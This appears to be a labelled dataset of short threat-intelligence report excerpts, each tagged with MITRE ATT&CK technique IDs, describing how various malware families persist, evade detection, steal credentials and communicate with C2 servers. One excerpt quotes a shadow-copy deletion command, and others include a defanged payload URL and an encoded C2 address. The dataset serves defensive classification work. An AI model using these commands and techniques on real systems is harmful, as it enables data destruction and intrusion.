{"text1":"While operating in the victim\u2019s internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided. This information included items such as product\/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks. Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact","labels":"['T1213']"}
|
|
{"text1":"All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3","labels":"['T1204.002']"}
|
|
{"text1":"The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86","labels":"['T1543.003']"}
|
|
{"text1":"While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code","labels":"['T1547.009', 'T1059.003']"}
|
|
{"text1":"This spyware registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries","labels":"['T1543.003']"}
|
|
{"text1":"As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle\u2019s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ..\/Resources\/Base.lproj\/Submenu.nib. This file is copied directly to the user's Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder","labels":"['T1564.001']"}
|
|
{"text1":"At the beginning of 2017, Silent Librarian began to regularly obtain free Let\u2019s Encrypt SSL certificates for their phishing pages. This technique, which we have previously discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages","labels":"['T1588.004']"}
|
|
{"text1":"The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co","labels":"['T1553.002']"}
|
|
{"text1":"Lucifer also checks for the presence of the following device drivers, DLLs, and virtual devices. If any of these objects are detected, the malware enters an infinite loop, stopping its execution from going further","labels":"['T1497.001']"}
|
|
{"text1":"If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1562.001']"}
|
|
{"text1":"The HTTP mode is the same communication method used in variants of the malware from 2018. Although it uses the non-encrypted HTTP protocol to communicate with the C2 it manually encrypts the contents of the requests to hide data from packet inspection. The malware creates an AES session key and initial value (as detailed in Appendix C) which are base64 encoded, appended to each other with a \\n separator. Once appended, it is further encrypted with a hardcoded RSA public key and base64 encoded again and obfuscated before being sent to the C2 as the body of a POST request","labels":"['T1573.001']"}
|
|
{"text1":"BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified","labels":"['T1071.001']"}
|
|
{"text1":"This watchdog process also ensures that the Cardinal RAT process is always running, as well as ensures that the executable is located in the correct path. Should either of these conditions not be met, the watchdog process will spawn a new instance of Cardinal RAT, or write Cardinal RAT to the correct location, respectively","labels":"['T1057']"}
|
|
{"text1":"The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks\u00ae Counter Threat Unit\u2122 (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group","labels":"['T1195.002']"}
|
|
{"text1":"In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment by BusinessLayerHost.exe at around 10:00 AM UTC. 7z.dll), Far Manager (e.g. The Variant 2 custom loaders were mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e. the open-source source code for these applications was modified to add in the malicious code). In some instances, certain development artifacts were left behind in the custom loader samples. For example, the following C++ header (.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code (c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp","labels":"['T1036']"}
|
|
{"text1":"KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32._fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed, the rest of the code takes care of restoring the KernelCallbackTable to its original state","labels":"['T1070']"}
|
|
{"text1":"In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function. Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine","labels":"['T1059.001']"}
|
|
{"text1":"The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them","labels":"['T1490']"}
|
|
{"text1":"Apart from being a flexible and easy-to-use scripting language, BLADABINDI\u2019s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload \u2014 the backdoor \u2014 difficult to detect","labels":"['T1027.004']"}
|
|
{"text1":"DEATHRANSOM creates an RSA-2048 public and private key pair. The shared secret is SHA256 hashed and used as the key to Salsa20 encrypt the RSA public and private keys. The RSA public key is used to encrypt the individual symmetric keys that are used to encrypt each file. A Base64 encoded version of the encrypted RSA keys and the victim\u2019s Curve25519 public key is included in the ransom note, providing the threat actors the information needed to decrypt the victim's files. For the symmetric key, DEATHRANSOM calls RtlGenRandom to generate 32 random bytes. This is the 32 byte key used to AES encrypt each file. After the file is encrypted, the AES key is encrypted with the public RSA key and appended to the file. DEATHRANSOM lastly appends the four magic bytes of AB CD EF AB at the end of the encrypted file and uses this as a check to ensure that it does not encrypt an already encrypted file. The analyzed DEATHRANSOM sample used for comparison does not change the file extension","labels":"['T1486']"}
|
|
{"text1":"The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server","labels":"['T1074.001']"}
|
|
{"text1":"In an uninhibited Emotet infection, it\u2019s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some\u00a0good analyses of Emotet\u00a0if you\u2019re looking for further reading","labels":"['T1210']"}
|
|
{"text1":"Another interesting artefact is that the script modifies the modification, access and creation (MAC) times of the local log file to match the times of a legitimate file \u2013 desktop.ini in that example, as shown in Figure 13","labels":"['T1070.006']"}
|
|
{"text1":"infpub.dat appears to be capable of brute-forcing NTLM login credentials to Windows machines that have pseudo-random IP addresses","labels":"['T1110.003']"}
|
|
{"text1":"The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of the methods uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potentially vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute","labels":"['T1189']"}
|
|
{"text1":"Although tracking threats like Winnti involves old-fashioned investigative work, Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale. When attackers used Winnti to maintain access to web servers, they hid the implant in plain sight by masquerading it as a trusted, legitimate file","labels":"['T1036.005']"}
|
|
{"text1":"The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz","labels":"['T1003.001']"}
|
|
{"text1":"So attackers specify an external C&C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the internal network by the tool and any response that the tool gets from a computer in the internal network goes to the C&C server. Thus, attackers can communicate with internal servers that are normally unreachable from the internet","labels":"['T1090']"}
|
|
{"text1":"IronNetInjector is made of an IronPython script that contains a .NET injector and one or more payloads. The payloads can also be .NET assemblies (x86\/64) or native PEs (x86\/64). When an IronPython script is run, the .NET injector gets loaded, which in turn injects the payload(s) into its own or a remote process","labels":"['T1055']"}
|
|
{"text1":"Prior to executing fully, Karagany uses a robust anti-VM detection function that can detect most commonly used virtualization platforms such as VMWare, VirtualBox, VPC, and generic virtualization techniques. Only the VMWare and VirtualBox checks were retained, mainly based on loaded drivers and file paths. This change dramatically reduced the file size of the malware","labels":"['T1497.001']"}
|
|
{"text1":"Next, the dropper checks its own parent process for indications that it is running in a sandbox setup. It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions is met","labels":"['T1057']"}
|
|
{"text1":"As with other versions of Winnti, the core component of the malware doesn\u2019t natively provide the operators with distinct functionality\u2078. This component is primarily designed to handle communications and the deployment of modules directly from the command-and-control servers. However, prior reporting\u2079 suggests that the operators commonly deploy plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host. We expect similar functionality to be leveraged via additional modules for Linux","labels":"['T1105']"}
|
|
{"text1":"In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook","labels":"['T1027']"}
|
|
{"text1":"The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied","labels":"['T1027.001']"}
|
|
{"text1":"In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached to phishing emails; phishing URL links in emails appear to be the Hangover group\u2019s modus operandi","labels":"['T1566.002']"}
|
|
{"text1":"The updated module is called tvncDLL and allows the threat actor to monitor the victim and collect information that would enable pivoting to valuable systems on the network","labels":"['T1021.005']"}
|
|
{"text1":"The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression","labels":"['T1027']"}
|
|
{"text1":"For readers unaware of ngrok, this site is a simple reverse proxy used to let Internet-based users connect to servers located behind firewalls or on local machines that don't have a public IP address","labels":"['T1090']"}
|
|
{"text1":"At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran\u2019s Railways and a message similar to the one displayed on the platform boards of different railway stations in Iran","labels":"['T1491.001']"}
|
|
{"text1":"Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor. In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1059.001']"}
|
|
{"text1":"Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload \u2013 part of Cobalt Strike software \u2013 to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks","labels":"['T1566.001']"}
|
|
{"text1":"Both masscan and pnscan have been used before by TeamTNT actors. However, the addition of zgrab, a GoLang network scanner, marks the first time that a GoLang tool has been witnessed incorporated into TeamTNT\u2019s TTPs. There was also an update to the masscan network scanner operation to include searching for TCP port 5555. This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations. However, there is little evidence to support TeamTNT targeting Android devices","labels":"['T1046']"}
|
|
{"text1":"The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group","labels":"['T1087.002']"}
|
|
{"text1":"The \u201cpc\u201d binary checks whether the infected system\u2019s OS is Debian or RHEL\/CentOS. Its routine, which involves dropping the cryptocurrency miner and other components, depends on OS. For Debian-based systems, it drops the cryptocurrency miner payload to \/tmp\/miner2. For CentOS\/RHEL systems, it will download a tar (tape archive) file from the URL, hxxp:\/\/pm[.]ipfswallet[.]tk\/cos7[.]tar[.]gz, containing the cryptocurrency miner and its multiple components, which is unpacked and then installed","labels":"['T1082']"}
|
|
{"text1":"The injected payload is known as Cobalt Strike Beacon and can be used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files. The\u00a0Get-NetComputer\u00a0command from\u00a0PowerView\u00a0is renamed by the attackers to a random name","labels":"['T1018']"}
|
|
{"text1":"Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis","labels":"['T1055.003']"}
|
|
{"text1":"After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers","labels":"['T1001.002']"}
|
|
{"text1":"It also uses \u201cActiveXObject\u201d utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them","labels":"['T1559.002']"}
|
|
{"text1":"h) It also uses \u201cActiveXObject\u201d utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them","labels":"['T1559.002']"}
|
|
{"text1":"With the above done, the malware logs off all users and executes a small program \u2014 a \u201clocker\u201d \u2014 in a new thread. The path to the locker file named mssetup.exe is retrieved from the configuration. Finally, before moving to its main cause \u2014 wiping the system \u2014 the malware creates a scheduled task that assures its own persistence in the system. The scheduled task will be executed every time the system starts","labels":"['T1053.005']"}
|
|
{"text1":"Malware uses xor key [0x09, 0xff, 0x20] to decrypt content in .data section and get string \u201caHR0cDovLzUxLjE1LjE5Ni4zMC8xL2luZGV4LnBocA\u201d. Then malware does base64 decoding to get the C2 address","labels":"['T1140']"}
|
|
{"text1":"Activation of these hooks is done by Ebury injecting its dynamic library into every descendant process of sshd. To inject itself into subprocesses, Ebury hooks execve and uses the dynamic linker LD_PRELOAD variable. Every time a new process is created, Ebury adds LD_PRELOAD=<Ebury_filename> to its environment. Once the new process is executed, Ebury\u2019s dynamic library is loaded and its constructor is called, executing the hooking routines","labels":"['T1574.006']"}
|
|
{"text1":"One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory. While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256. CrowdStrike was able to reconstruct the PowerShell script from the PowerShell Operational event log as the script\u2019s execution was logged automatically due to the use of specific keywords. CrowdStrike recommends that organizations upgrade PowerShell on their systems, as this functionality is only available with PowerShell version 5 and above","labels":"['T1059.001']"}
|
|
{"text1":"Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name \u201cremote overlay\u201d) designed to appear like they are part of the bank\u2019s website. These pages can either block the victim\u2019s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out","labels":"['T1185']"}
|
|
{"text1":"Each of these weaponized documents used the same tactic for their attacks. Upon opening the document, it leveraged the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document as seen in Figure 4","labels":"['T1221']"}
|
|
{"text1":"Daserf also uses file and folder names related to legitimate programs often found in Windows environments in order to blend in. Observed folder names include HP, Intel, Adobe, and perflogs and folders are generally created in either the root drive or the Application Data or Program Files folders. File names used in recent attacks include adobe.exe, adobe_sl.exe, intel.exe, and intellog.exe","labels":"['T1036.005']"}
|
|
{"text1":"Microsoft has been monitoring these attacks and notifying targeted customers for several months, but only recently reached a point in our investigation where we can attribute the activity to Strontium with high confidence. MSTIC\u2019s investigation revealed that Strontium has evolved its tactics since the 2016 election to include new reconnaissance tools and new techniques to obfuscate their operations. In recent months, it has engaged in brute force attacks and password spray, two tactics that have likely allowed them to automate aspects of their operations. Strontium also disguised these credential harvesting attacks in new ways, running them through more than 1,000 constantly rotating IP addresses, many associated with the Tor anonymizing service. Strontium even evolved its infrastructure over time, adding and removing about 20 IPs per day to further mask its activity","labels":"['T1110.003']"}
|
|
{"text1":"Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered","labels":"['T1528']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Select specific files to steal, creating a new list. Use downloaders or other malware to send the new list to a compromised host. Use archiving software to collect files in a password-protected archive. Use an uploader or other malware to send the archived files to an attacker-controlled server. The uploader software is proprietary to this group, but Datper and xxmm also contain an uploading feature. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1083']"}
|
|
{"text1":"an extra executable; - process hollowing shellcode; - a list of predefined executable names, which the malware uses as a future process name","labels":"['T1055.012']"}
|
|
{"text1":"ISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it will switch to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"www. to the configured C2 domain and issues a DNS query to resolve this domain","labels":"['T1008']"}
|
|
{"text1":"Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this is an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42\u2019s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus\u2019 use of open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near future","labels":"['T1566.001']"}
|
|
{"text1":"The instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we\u2019re going to talk about the XLS used as the attack vector and the UAC bypass technique used","labels":"['T1548.002']"}
|
|
{"text1":"Aside from security programs and other programs used daily that can be used to profile its targets, the DUBNIUM malware also checks for various program analysis tools including Pin and DynamoRIO. It also checks for a virtual machine environment. If some of these are detected, it quits its execution. Overall, the malware is very cautious and deterministic in running its main code","labels":"['T1497.001']"}
|
|
{"text1":"SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication","labels":"['T1090.004']"}
|
|
{"text1":"The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers","labels":"['T1559.001']"}
|
|
{"text1":"To deliver the malware to the victim machines, the Rocke group exploits vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. For example, by exploiting Oracle WebLogic vulnerability CVE-2017-10271 in Linux shown in Figure 1, a compromised Linux victim machine downloads backdoor 0720.bin and opens a shell","labels":"['T1190']"}
|
|
{"text1":"This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading\/download and arbitrary command execution. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together","labels":"['T1083']"}
|
|
{"text1":"In the period between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial institutions","labels":"['T1133']"}
|
|
{"text1":"The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23","labels":"['T1056.002']"}
|
|
{"text1":"Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL. The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself","labels":"['T1027.001']"}
|
|
{"text1":"TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file. The group notably abuses Excel 4.0 macro \u2014 a particularly old macro likely used to evade typical macro detection","labels":"['T1204.002']"}
|
|
{"text1":"During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code","labels":"['T1027', 'T1036.004']"}
|
|
{"text1":"The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files","labels":"['T1070.003', 'T1046']"}
|
|
{"text1":"PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2","labels":"['T1129']"}
|
|
{"text1":"The next step after installing the malicious service would be to set up tunnels to access the infected machine from remote hosts, for example using the following command","labels":"['T1090']"}
|
|
{"text1":"Turla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk","labels":"['T1059.001']"}
{"text1":"Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target\u2019s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment. TEMP.Veles\u2019 lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection","labels":"['T1027.005']"}
{"text1":"The stage\u2019s 0x102 resource is parsed and the files are dropped in either %ProgramFiles% or %AppData% in the randomly chosen folder. The creation times are changed to have the same values as kernel32.dll","labels":"['T1070.006']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones. The threat involved in this incident is referred to as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. When loaded, its exported function DllEntryPoint() will be called automatically. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create an autorun.inf file with an instruction to run that file. The Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map. File wmcache.nld: The second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file. File winview.ocx: The second spawned thread will log threat activity into the file %system32%\\winview.ocx. This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container, has no effect. Files thumb.dd and mssysmgr.ocx: Agent.btz is capable of creating a binary file thumb.dd on a newly connected drive","labels":"['T1091']"}
{"text1":"The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim\u2019s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \u201cfile-less\u201d aspect of this method","labels":"['T1547.001']"}
{"text1":"Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim\u2019s domain","labels":"['T1018', 'T1087.002']"}
{"text1":"The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches","labels":"['T1053.005']"}
{"text1":"Mouse position: Darkhotel repeatedly checks for the position of the mouse cursor on the screen. If the cursor remains at the center of the desktop, it is unlikely that a real user is using the system. Because of this, most sandboxes periodically move the mouse cursor or perform some other type of interaction with the desktop","labels":"['T1497.002']"}
{"text1":"In what appears to be a first on the cyber-espionage scene, a nation-state-backed hacking group has used a Google Chrome extension to infect victims and steal passwords and cookies from their browsers","labels":"['T1176', 'T1555.003']"}
{"text1":"The Python\/TeleBot malware uses exactly the same approach; the Python backdoor code is obfuscated and packed into a standalone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted, compressed using zlib library and then Base64 encoded","labels":"['T1027']"}
{"text1":"But what really makes this backdoor interesting is the way in which it communicates with attackers in order to receive commands. Python\/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. We have informed Telegram of this abuse of their communication platform","labels":"['T1102.002']"}
{"text1":"The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory","labels":"['T1140', 'T1620']"}
{"text1":"It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv","labels":"['T1003.003']"}
{"text1":"The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost","labels":"['T1012']"}
{"text1":"In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. Through 2013, registry persistence was set using standard Windows APIs. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe","labels":"['T1547.001']"}
{"text1":"Delete the shadow volumes with vssadmin (\u201cvssadmin Delete Shadows \/all \/quiet\u201d). - Resize the shadow storage for all units with drive letters from C to H (hardcoded letters) to avoid the shadow volumes being made again. Use the bcdedit program to disable the recovery options in the boot of the machine and set it to ignore any failure in the boot without warning the user","labels":"['T1490']"}
{"text1":"The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit","labels":"['T1055.001']"}
{"text1":"It also has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware (example in Figure 6","labels":"['T1497.001']"}
{"text1":"When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation. Three known vulnerabilities are targeted","labels":"['T1203']"}
{"text1":"RunningRat is a remote access Trojan (RAT) that operates with two DLLs. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself","labels":"['T1059.003']"}
